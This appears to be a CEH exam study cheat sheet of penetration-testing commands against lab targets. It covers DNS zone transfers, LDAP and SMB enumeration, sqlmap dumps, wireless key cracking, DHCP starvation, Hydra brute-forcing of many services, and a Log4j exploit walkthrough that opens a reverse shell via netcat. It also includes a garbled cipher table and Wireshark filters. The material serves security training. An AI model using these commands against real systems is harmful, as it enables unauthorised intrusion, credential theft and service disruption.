Reconnaissance and Enumeration

1.Physical Location of Servers

1. https://www.ipvoid.com/
2. BillCipher
Installation and usage: https://www.geeksforgeeks.org/billcipher-an-information-
gathering-tool-in-kali-linux/

2. Performing Zone Transfers

2.1. Perform DNS Enumeration using Nmap
In the terminal window, type nmap --script=broadcast-dns-service-discovery [Target
Domain] and press Enter (here, the target domain is certifiedhacker.com).

2.2. Attempt a Zone Transfer: Using one of the DNS servers found in the previous
step, attempt a zone transfer with the AXFR query:

dig @<dns-server> <target-domain> AXFR

Replace <dns-server> with the IP address or hostname of the DNS server.

Replace <target-domain> with the target domain name

2.3. Automate Zone Transfer with dnsrecon

Tools like dnsrecon can automate zone transfer attempts and other DNS enumeration
tasks:
dnsrecon -d <target-domain> -t axfr
2.4. Automate Zone Transfer with nmap
Nmap has a DNS zone transfer script (dns-zone-transfer):
nmap --script dns-zone-transfer -p 53 <dns-server>
2.5. Automate Zone Transfer with dig
dig www.certifiedhacker.com -axfr

3. Identifying live Hosts on a Subnet

3.1. nmap -sn -PU <Target IP Address> >>> ✓ UDP response - Host is active ✓
Error messages (host/network unreachable or TTL exceeded) - Host is inactive
✓ Detects systems behind firewalls with strict TCP filtering

3.2. nmap -sn -PR <Target IP Address> >>>

✓ ARP response - Host is active ✓ No response - Host is inactive
✓ More efficient and accurate than other host discovery techniques
✓ Useful for system discovery, where one may need to scan large address
spaces

4. LDAP Enumeration (Ties to RPC and SMB Enumeration)

https://www.youtube.com/watch?v=-vjF3kgvWVg
4.1. Perform LDAP enumeration on the target network and find out how many
user accounts are associated with the domain.
ldapsearch -x -h 10.10.10.25 -b "DC=CEHORG,DC=com" "objectclass=user" cn >>
DC information is obtained from a deep scan of the AD machine.
Or
Rpcclient -U “” -N <IP> >> type “help” when you get to an rpc shell & Type
‘enumdomusers’ to get all domain users
4.2. Perform an LDAP Search on the Domain Controller machine and find out the
version of the LDAP protocol.
ldapsearch -h 10.10.10.25 -x -s base namingcontexts
4.3. Bruteforce LDAP with known usernames:
hydra -L userlist.txt -P passwords.txt -s 389 -o results.txt ldap3://<LDAP_Server_IP>
or
hydra -L userlist.txt -P passwords.txt ldap3://<LDAP_Server_IP>

5. SMB Enumeration
5.1. Start with SMB Map >> smbmap -H <ip>
5.2. Try a null session login >> smbclient -L <IP> -U “”
5.3. Checking for SMB signing: nmap -A -T4 <IP>
6. RPC Enumeration
6.1. Use Rpcclient >> rpcclient -U “” -N <IP> >> type “help” when you get to an rpc
shell.
Type enumdomusers to get all domain users
7. DNS Server Enumeration
7.1. Nmap: https://www.youtube.com/watch?v=Qf3QxCoC15s
7.2. Dnsenum >> dnsenum www.certifiedhacker.com
8. Version of Software used by the web server
8.1. Using WhatWeb
whatweb www.site.com
8.2. Using BillCipher
9. Obtaining the Etag of a WebServer
Using curl : curl -s -I <ip of webserver>
10. Identify the Content Management System used
1. Using wig : wig www.cehorg.com
2. Using Wappalyzer Mozzila Addon
11. Live Crawling of a website to identify images and subtree
1. Using OWASP ZAP
2. Using Burpsuite
12. SQL Injection with SQL MAP
sqlmap -u www.site.com (The full url after login) –-cookie=”” (cookie obtained via
console with the following command “document.cookie”) –-batch –-dump all
or
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="<Cookie
Value>" -D moviescope -T User_Login --dump
13. Perform XSS vulnerability test
1. Using GhostEye
https://www.geeksforgeeks.org/how-to-install-ghost_eye-tool-in-kali-linux/
2. Using PwnXSS
Type cd PwnXSS and press Enter to enter into PwnXSS directory.
To perform scan on target website, type : python3 pwnxss.py -u
http://testphp.vulnweb.com and press Enter.
Note: -u: specifies the target url (here, http://testphp.vulnweb.com). However, you can
select a target URL of your choice.

14. Perform wireless attacks

o Crack a WEP network using Aircrack-ng

802.11 protocol indicates wireless packets.

aircrack-ng '/home/attacker/Desktop/Sample Captures/WEPcrack-01.cap' and
press Enter.
By issuing the above command aircrack-ng will crack the WEP key
o Crack a WPA2 network using Aircrack-ng

Type aircrack-ng -a2 -b [Target BSSID] -w

/home/attacker/Desktop/Wordlist/password.txt '/home/attacker/Desktop/Sample
Captures/WPA2crack-01.cap'
Sniffing
1. DHCP Starvation Attack
Use Yersinia>> sudo Yersinia -G
Click on ‘Launch Attack’
Choose DHCP
Tick the send Discovery packets and click ok
Monitor with Wireshark
Some examples of DHCP starvation attack tools are listed below: ▪
dhcpStarvation.py (https://github.com) ▪ Hyenae (https://sourceforge.net) ▪
dhcpstarv (https://github.com) ▪ Gobbler (https://sourceforge.net) ▪ DHCPig
(https://github.com)

2. Wireshark Viewing Commands

Vulnerability Scanning
1. OpenVas
How to start on terminal: sudo gvm-start
 https://hassen-hannachi.medium.com/installing-openvas-on-kali-linux-
a54baeaf806a

Gaining Access
1. Cracking Hashes
I. John the Ripper >> john --format=NT hashes.txt
2. Password Auditing
1. Using L0phtCrack >> https://www.youtube.com/watch?v=jGFGQ6Nrc40

3. SSH id_RSA Key Passphrase Cracking

https://robertholdsworthsecurity.medium.com/how-to-crack-an-ssh-private-
key-passphrase-ab7dd1583178
https://www.hackingarticles.in/ssh-penetration-testing-port-22/

Enumerating SSH authentication method

Using Nmap>> nmap --script ssh-auth-methods --script-
args="ssh.user=pentest" -p 22 192.168.31.205

4. Gain Access by Exploiting Log4j Vulnerability

In the address bar of the browser, type http://<IP>:8080 and press Enter.
Click the MATE Terminal icon at the top of Desktop, to open a Terminal window.
Type cd log4j-shell-poc and press Enter, to enter into log4j-shell-poc directory.
Now, we needed to install JDK 8, to do that open a new terminal window and type
sudo su and press Enter to run the programs as a root user.

We need to extract JDK zip file which is already placed at /home/attacker

location.
Type tar -xf jdk-8u202-linux-x64.tar.gz and press Enter, to extract the file. Note: -xf:
specifies extract all files.
Now we will move the jdk1.8.0_202 into /usr/bin/. To do that, type mv jdk1.8.0_202
/usr/bin/ and press Enter.

Now, we need to update the installed JDK path in the poc.py file.
Navigate to the previous terminal window (log4j-shell-poc). In the terminal, type
pluma poc.py and press Enter to open poc.py file.
In the poc.py file scroll down and in line 62, replace jdk1.8.0_20/bin/javac with
/usr/bin/jdk1.8.0_202/bin/javac.
Scroll down to line 87 and replace jdk1.8.0_20/bin/java with
/usr/bin/jdk1.8.0_202/bin/java.
Scroll down to line 99 and replace jdk1.8.0_20/bin/java with
/usr/bin/jdk1.8.0_202/bin/java.
Save all changes

Now, open a new terminal window and type nc -lvp 9001 and press Enter, to initiate a
netcat listener
Switch to previous terminal window (log4j-shell-poc directory) and type python3 poc.py
--userip 10.10.1.13 --webport 8000 --lport 9001 and press Enter, to start the exploitation
and create payload.
10.10.1.13 is your IP>> Check your IP with ifconfig and pick the eth0 IP.
Now, copy the payload generated in the send me: section.

Switch to Firefox browser window, in Username field paste the payload that was
copied in previous step and in Password field type password and press Login
button as shown in the screenshot.
Note: In the Password field you can enter any password.
Now switch to the netcat listener, you can see that a reverse shell is opened.
In the listener window type pwd and press Enter, to view the present working directory.
5.Bruteforcing Passwords
1. WPSCAN
Brute-force WordPress Login with WPScan: wpscan --url http://example.com --
username <user> --passwords <password_list> --enumerate u
--url: The target WordPress website.
--username <user>: A specific username to attempt brute-forcing.
--passwords <password_list>: A file containing passwords to try.
 --enumerate u: Enumerates users (useful if you don't know the usernames and need
WPScan to find them). wpscan --url http://example.com --wordlist /path/to/wordlist.txt --
enumerate u

2. Hydra
Syntax for Hydra (for WordPress): hydra -l <username> -P <password_list>
<target> http-get-form "/wp-login.php:log=^USER^&pwd=^PASS^:Invalid
username"
-l <username>: The username to try.
-P <password_list>: The password list to use.
<target>: The target WordPress website (e.g., example.com).
http-get-form: The protocol and form-based authentication method used by
WordPress.
 /wp-login.php: The login page URL (commonly /wp-login.php for WordPress).
 log=^USER^&pwd=^PASS^: The form field names where ^USER^ will be
replaced with the username and ^PASS^ will be replaced with the password.
 Invalid username: The keyword in the response page when authentication
fails. Hydra will look for this text to determine if the login attempt was
successful or not.

Using Hydra for Other Services:

hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10
hydra -l <username> -P <password_list> ftp://<target_ip>
hydra -l <username> -P <password_list> <target_url> http-get >>http-get:
This option specifies that Hydra will attempt GET requests for HTTP
authentication. (hydra -l admin -P /usr/share/wordlists/rockyou.txt
http://example.com/login http-get)
hydra -l <username> -P <password_list> mysql://<target_ip>
hydra -l <username> -P <password_list> rdp://<target_ip>
hydra -l <username> -P <password_list> telnet://<target_ip>
hydra -l <username> -P <password_list> smtp://<target_ip>
hydra -l <username> -P <password_list> imap://<target_ip>
hydra -l user -P /usr/share/wordlists/rockyou.txt pop3://192.168.1.10
Additional Hydra Options
 -t <num>: Number of concurrent threads (default is 16). Increase this value to
speed up the brute-force attack.
o Example: -t 64 for 64 threads.
 -vV: Enables verbose mode (displays progress of each attempt).
 -f: Exit on the first successful login.
  -s <port>: Specify a custom port if the service is running on a non-default port.
o Example: -s 2222 for SSH running on port 2222.
 -w <timeout>: Specifies the timeout value in seconds for each connection
attempt.
 -I: Ignore any errors related to HTTP 404, 403, etc.
hydra -L /path/to/usernames.txt -P /path/to/passwords.txt -t 16 -vV -f
ssh://192.168.1.10

6. Website Directory Enumeration

gobuster dir -u http://example.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-
small.txt

Cryptography: Encryption and Steganography

1. Text Steganography
Using Snow.exe >> https://darkside.com.au/snow/
Navigate to E:\CEH-Tools\CEHv12 Module 06 System Hacking\Steganography
Tools\Whitespace Steganography Tools, copy the Snow folder, and paste it on
Desktop.
In the Command Prompt window, type cd C:\Users\Admin\Desktop\Snow and
press Enter.
Type >>> .\SNOW.EXE -C Confidential.txt
2. Image Steganography
Some examples of image steganography tools are as follows:
▪ StegOnline (https://stegonline.georgeom.net)
▪ Coagula (https://www.abc.se)
▪ QuickStego (http://quickcrypto.com)
▪ SSuite Picsel (https://www.ssuitesoft.com) ▪ CryptaPix
(https://www.briggsoft.com)
3. Encryption Algorithms with their Block Size and Key Sizes

Block
Cipher Key Size Notes
Size

AES (Advanced 128 128, 192, or Most widely used block cipher today,
Encryption Standard) bits 256 bits supports multiple key sizes.

DES (Data Encryption 64 56 Deprecated due to security weaknesses, but

Standard) bits bits historically important.

3DES (Triple 64 112 or 168 bits Successor to DES, uses three DES
DES) bits (effectively) operations for improved security.

32 to 448 A fast and flexible cipher, often used in secure

Blowfish 64 bits
bits applications.

Successor to Blowfish, highly secure and

Twofish 128 bits 128, 192, or 256 bits
flexible.

RC5 (Rivest 64 0 to 2040 bits Highly configurable, with block sizes up

Cipher 5) bits (variable) to 128 bits.

128, 192, or 256 Similar to RC5, used in AES competition but not
RC6 128 bits
bits adopted.

CAST-128 64 bits 40 to 128 bits A symmetric key block cipher used in SSL and IPsec.

CAST-256 128 bits 128 to 256 bits Successor to CAST-128, with larger key sizes.

IDEA (International Data 64 128 Block cipher used in PGP and various
Encryption Algorithm) bits bits encryption protocols.

128 128, 192, or Strong cipher with similar design to AES, used in
Camellia
bits 256 bits Japan and other regions.

KASUMI 64 bits 128 bits Block cipher used in 3G mobile communications.

128 128, 192, or 256 High-security block cipher, designed as an AES

Serpent
bits bits alternative.

MISTY1 64 bits 128 bits Designed for use in financial applications.

128, 192, or 256 Used in some secure communications

SHACAL-2 128 bits
bits protocols.

HIGHT 64 bits 128 bits Lightweight block cipher for hardware environments.

64 bits or 128 128, 192, or 256 Lightweight cipher used in military and
SIMON
bits bits embedded systems.

64 bits or 128 128, 192, or 256 Designed for use in constrained environments
SPECK
bits bits (e.g., IoT).
 4. Cryptanalysis tools
1. Cryp Tool
5. Integrity Checking
MD5 Hash calc
Malware Threat Analysis
1. String Searching
Static Analysis
Search for strings ; File Pos, Mem Pos, ID and Text using BinText.

2. Disassembling and Debugging Tools

Ghidra >> Create New Project>> Import file for analysis
3. Registry Monitoring
Dynamic Analysis
Navigate to E:\CEH-Tools\CEHv12 Module 07 Malware Threats\Malware
Analysis Tools\Dynamic Malware Analysis Tools\Registry Monitoring Tools\
Reg Organizer. double-click reg-organizer-setup.exe
Now, click TOOLS from the menu bar and select Registry Snapshots option
from the context menu
Registry Snapshots Comparison window appears, click Create Snapshot
option.
Enter the snapshot name field and click OK.

4. Service Monitoring
Dynamic Analysis
Windows Service Manager.exe
5. APK Analysis
https://sisik.eu/apk-tool
Cyber Security Notes
https://github.com/3ls3if/Cybersecurity-Notes/blob/main/readme/ceh-engage-
walkthrough/
WireShark Filters

1. IP Address Filters
 Source IP Address:
ip.src == 192.168.1.1
o Filters packets with a source IP of 192.168.1.1.
 Destination IP Address:
ip.dst == 192.168.1.100
o Filters packets with a destination IP of 192.168.1.100.
  IP Address Range:
ip.src >= 192.168.1.1 && ip.src <= 192.168.1.255
o Filters packets from a specific IP address range.
 Subnet Filtering:
ip.src == 192.168.1.0/24
o Filters packets coming from the 192.168.1.0/24 subnet.

2. Protocol Filters
 TCP Traffic:
tcp
Filters all TCP traffic.
o
 UDP Traffic:
udp
Filters all UDP traffic.
o
 HTTP Traffic:
http
o Filters HTTP packets.
 DNS Traffic:
dns
o Filters DNS traffic.
 ICMP Traffic:
icmp
o Filters ICMP packets (e.g., ping requests).
 ARP Traffic:
arp
o Filters ARP packets.
 SSL/TLS Traffic:
ssl
o Filters SSL/TLS encrypted traffic.

3. Port Filters
 Traffic on a Specific Port:
tcp.port == 80
Filters TCP traffic on port 80 (HTTP).
o
 Traffic on Any Port:
tcp.port == 443
Filters TCP traffic on port 443 (HTTPS).
o
 Traffic on a Range of Ports:
tcp.port >= 1024 && tcp.port <= 2048
o Filters TCP traffic on ports within a specific range.
 Exclude a Port:
!(tcp.port == 80)
 o Excludes traffic on port 80.

4. TCP Flags Filters

 SYN Flag:
tcp.flags.syn == 1
o Filters TCP packets with the SYN flag set (used in connection initiation).
 ACK Flag:
tcp.flags.ack == 1
o Filters TCP packets with the ACK flag set.
 FIN Flag:
tcp.flags.fin == 1
o Filters TCP packets with the FIN flag set (used to close a connection).
 RST Flag:
tcp.flags.rst == 1
o Filters TCP packets with the RST flag set (used to reset a connection).

5. HTTP Filters
 HTTP Request Method (GET):
http.request.method == "GET"
oFilters HTTP GET requests.
 HTTP Request Method (POST):
http.request.method == "POST"
oFilters HTTP POST requests.
 HTTP Host Header:
http.host == "example.com"
o Filters HTTP traffic with a specific host header.
 HTTP URI:
http.request.uri contains "login"
o Filters HTTP requests containing the keyword "login" in the URI.

6. DNS Filters
 DNS Query:
dns.flags.request == 1
oFilters DNS query packets.
 DNS Response:
dns.flags.response == 1
oFilters DNS response packets.
 DNS Query for Specific Domain:
dns.qry.name == "example.com"
o Filters DNS queries for a specific domain.
7. Ethernet Filters
 Source MAC Address:
eth.src == 00:11:22:33:44:55
o Filters packets with a specific source MAC address.
 Destination MAC Address:
eth.dst == 00:11:22:33:44:55
o Filters packets with a specific destination MAC address.

8. TCP Stream Filters

 TCP Stream ID:
tcp.stream eq 1
o Filters packets from a specific TCP stream (e.g., stream ID 1).

9. Filtering by Packet Size

 Packet Larger Than a Specific Size:
frame.len >= 1000
oFilters packets larger than 1000 bytes.
 Packet Smaller Than a Specific Size:
frame.len <= 64
o Filters packets smaller than or equal to 64 bytes.

10. Specific Packet Analysis

 TCP Retransmissions:
tcp.analysis.retransmission
o Filters TCP retransmitted packets.
 Duplicate Acknowledgments:
tcp.analysis.duplicate_ack
o Filters TCP packets with duplicate ACKs.
 Round Trip Time (RTT):
tcp.analysis.ack_rtt
o Filters packets based on TCP Round Trip Time (RTT).

11. IP Version Filtering

 IPv4 Traffic:
ip.version == 4
o Filters IPv4 packets.
 IPv6 Traffic:
ip.version == 6
o Filters IPv6 packets.

12. Error and Bad Packets

  Packet Errors:
eth.err
o Filters packets with Ethernet errors (e.g., bad checksums).

13. Custom Filters (Combining Multiple Conditions)

 Source IP and Port:
ip.src == 192.168.1.1 && tcp.port == 80
o Filters packets from a specific source IP and on a specific port.
 Exclude a Protocol:
not dns
oExcludes DNS packets.
 Combine Multiple Filters (AND/OR):
ip.src == 192.168.1.1 && tcp.port == 443 || udp.port == 53
o Combines multiple conditions to filter on source IP, ports, and protocols.